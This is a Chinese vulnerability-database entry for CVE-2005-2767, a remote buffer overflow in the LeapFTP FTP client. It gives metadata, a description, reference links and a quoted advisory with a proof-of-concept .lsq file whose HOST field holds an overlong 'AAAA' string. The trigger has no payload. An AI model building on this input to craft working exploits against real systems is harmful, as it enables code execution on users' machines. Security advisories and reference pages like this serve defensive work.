LeapFTP LSQ文件远程缓存溢出漏洞

LeapFTP LSQ文件远程缓存溢出漏洞

漏洞ID 1109026 漏洞类型 缓冲区溢出
发布时间 2005-08-24 更新时间 2005-10-20
图片[1]-LeapFTP LSQ文件远程缓存溢出漏洞-安全小百科CVE编号 CVE-2005-2767
图片[2]-LeapFTP LSQ文件远程缓存溢出漏洞-安全小百科CNNVD-ID CNNVD-200509-030
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/26194
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-030
|漏洞详情
LeapFTP是简易好用的FTP客户端软件。LeapFTP存在缓冲区溢出漏洞。该漏洞允许远程攻击者可以借助于SiteQueue(.lsq)文件中的长主机字符串执行任意的代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/14655/info

LeapFTP client is prone to a remote buffer overflow vulnerability.

The issue arises when the client handles a malformed LeapFTP Site Queue (.lsq) file.

A remote attacker may gain unauthorized access in the context of the user running the application.

LeapFTP versions prior to 2.7.6.612 are affected by this vulnerability.

//bof.lsq

[HOSTINFO]
HOST=AAAAA...[ long string ]...AAAAA
USER=username
PASS=password

[FILES]
"1","/winis/ApiList.zip","477,839","E:ApiList.zip"
|参考资料

来源:XF
名称:leapftp-site-queue-bo(21974)
链接:http://xforce.iss.net/xforce/xfdb/21974
来源:BID
名称:14655
链接:http://www.securityfocus.com/bid/14655
来源:www.leapware.com
链接:http://www.leapware.com/security/2005082301.txt
来源:MISC
链接:http://secway.org/advisory/AD20050824.txt
来源:SECUNIA
名称:16552
链接:http://secunia.com/advisories/16552/
来源:BUGTRAQ
名称:20050824LeapFTP.lsqBufferOverflowVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112491089723070&w;=2
来源:SECTRACK
名称:1014785
链接:http://securitytracker.com/id?1014785

相关推荐: WordPress Edit.PHP Cross-Site Scripting Vulnerability

WordPress Edit.PHP Cross-Site Scripting Vulnerability 漏洞ID 1096586 漏洞类型 Input Validation Error 发布时间 2005-05-17 更新时间 2005-05-17 CVE…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享